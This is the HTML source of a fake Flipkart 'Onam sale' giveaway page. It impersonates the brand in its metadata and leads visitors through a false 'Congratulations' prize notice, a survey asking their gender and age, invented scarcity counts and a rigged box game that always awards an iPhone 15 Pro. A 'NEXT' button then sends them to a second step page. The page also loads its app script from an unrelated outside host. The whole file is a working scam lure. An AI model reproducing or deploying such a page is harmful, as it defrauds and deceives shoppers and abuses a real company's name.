

<!doctype html>
<html lang="en" dir="ltr">
<head>
	

<title>FLOP krt EN</title>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta property="og:title" content="Flipkart 🇮🇳 FLAGSHIP SALE" />
        <meta property="og:type" content="website" /> 
        <meta property="og:url" content="https://flipkart.com" />
        <meta property="og:image" content="oglogo.jpeg" />
        <meta property="og:description" content="Free Gifts for EVERYONE! 🎁" />
        <link rel="image_src" href="oglogo.jpeg" />
        <meta property="og:image" content="oglogo.jpeg" />
        <meta name="twitter:image:src" content="oglogo.jpeg">
        <meta name="twitter:image" content="oglogo.jpeg">
        <link rel="icon" href="oglogo.jpeg">
<link href="https://giveaway.z0m.site/app.css?id=2fbe2d9a9a40ca9b2489" type="text/css" rel="stylesheet" />
<link href="style.css" type="text/css" rel="stylesheet" />
<meta name="robots" content="noindex,nofollow">

</head>
<img src='tiF5Kup.png' width='100%'/>
<img src='onat.png' width='100%'/>


<body>
<div class="app" id="app" v-cloak>
<vue-modal v-show="!showRotator && !showPrize" :open="showOpeningModal" class="opening-modal">
<img class="opening-modal__image" src="EVNSCJT.png" alt="Apple iPhone 13 Pro Max" />
<h1 class="heading heading--h1">
Congratulations !
</h1>
<p class="paragraph">
On the occasion of Flipkart ONAM SALE, You have been chosen among the few to receive a free prize.
</p>
<p class="paragraph">
</p>
<button class="button" v-on:click="showOpeningModal = false; $confetti.stop()">
CONTINUE
</button>
</vue-modal>
<vue-modal :open="showInstructionsModal">
<img src="oq1V9Rq.png" style="width: 80px;">
<h2 class="heading heading--h1">Congratulation ! </h2>
 <h4 class="heading heading--h1">Your answers have been saved</h4>
<p class="paragraph">
This is your chance!
<br><br>
You must select the box with the gift inside it.
<br><br>
you've got 3 attempts, Good luck! 
</p>
<button class="button" v-on:click="showInstructionsModal = false">
Start now
</button>
</vue-modal>
<vue-modal :open="showFailModal">
<img src="TNfiSS8.png" style="width: 150px;">
<h1 class="heading heading--h1">Better luck next time</h1>
<p class="paragraph">
You have (2) extra chances. 
</p>
<button class="button" v-on:click="showFailModal = false">
OK
</button>
</vue-modal>
<vue-modal :open="showSuccessModal">
<img src="J6VBK4X.png" style="width: 194px;">
<h1 class="heading heading--h1">Congratulations! </h1>
  <h3 class="heading heading--h1">You did it! you won : </h3>

<p class="paragraph">

( Apple iPhone 15 Pro - 128GB )
<br>
<br>Follow the instructions on the next page to claim your prize ! 
</p>
<button class="button" onclick="go();">
NEXT</button>
</vue-modal>
<div class="left">
<div class="product-preview">
<div class="product-preview__title">
</div>

</div>
</div>
<div class="right">
<vue-box-picker v-if="showBoxPicker" :vertical-items="4" lid-image="dWQkXik.png" box-image="3nn78SZ.png" box-back-image="f5sMBg7.png" prize-image="ebv1ovg.png" v-on:fail="onBoxPickerFail" v-on:success="onBoxPickerSuccess" :horizontal-items="3" :max-clicks="2"></vue-box-picker>
<div class="verify" v-if="showRotator">
<vue-text-rotator v-on:rotate="rotate" v-on:finished="onRotatorFinished" :strings='[
                     "Please wait ...",
              "Please wait ...",
              "Please wait ..."
            ]'>
</vue-text-rotator>
<div class="verify__text" v-if="rotateIndex > 1">
<strong>
You have answered all of the questions.
</strong>
<img class="verify__icon verify__icon--checked" src="7GcbObK.png" alt="" />
</div>
<div class="verify__text" v-else>
Your answers are being processed
<img class="verify__icon verify__icon--spinner" :class="{'verify__icon--visible' : rotateIndex > 0}" src="oBmGa4s.gif" alt="" />
</div>
<div class="verify__text" v-if="rotateIndex > 2">
<strong>
There are still prizes available!
</strong>
<img class="verify__icon verify__icon--checked" src="7GcbObK.png" alt="" />
</div>
<div class="verify__text" v-else>
Looking for gifts.. 
<img class="verify__icon verify__icon--spinner" :class="{'verify__icon--visible' : rotateIndex > 1}" src="oBmGa4s.gif" alt="" />
</div>
<div class="verify__text" v-if="rotateIndex > 3">
<strong>
Only (489) gifts remain!
</strong>
<img class="verify__icon verify__icon--checked" src="7GcbObK.png" alt="" />
</div>
<div class="verify__text" v-else>
Stock is being checked
<img class="verify__icon verify__icon--spinner" :class="{'verify__icon--visible' : rotateIndex > 2 }" src="oBmGa4s.gif" alt="" />
</div>
</div>
<vue-survey v-if="showSurvey" :show-steps="true" :questions='[
           {
              title: "Do you know Flipkart?",
              answers: [ { text: "YES" }, { text: "NO" } ]
            },
                                                             {
              title: "Whats your gender? ",
              answers: [ { text: "MALE" }, { text: "FEMALE" } ]
            },
            {
              title: "How old are you?",
              answers: [ { text: "18-21" }, { text: "22-29" }, { text: "30-39" }, { text: "40-59" }, { text: "60+" } ]
            },
                                                                         {
              title: "How would you rate Flipkart? ",
              answers: [ { text: "AMAZING" }, { text: "VERY GOOD" }, { text: "GOOD" }, { text: "NOT GOOD" } ]
            },
            {
              title: "Would you recommend us to your friend? ",
              answers: [ { text: "YES" }, { text: "NO" } ]
            },
          ]' v-on:finish="onSurveyFinish"></vue-survey>
</div>
</div>
       <img src='2Pv9v7H.jpeg' width='100%'/>

<script>window.view = window.view || {};view.qs = null;view.skip = 0;view.screenshot = 0;view.download = 1;view.noredir = false;</script> 
<script src="https://giveaway.z0m.site/app.js?id=17138759790b445ece6b" type="application/javascript"></script>

<script>
function go() {
    window.onbeforeunload = null;
	window.open('/step2.html');
    window.location = '#';
}
</script>

</body>
</html>


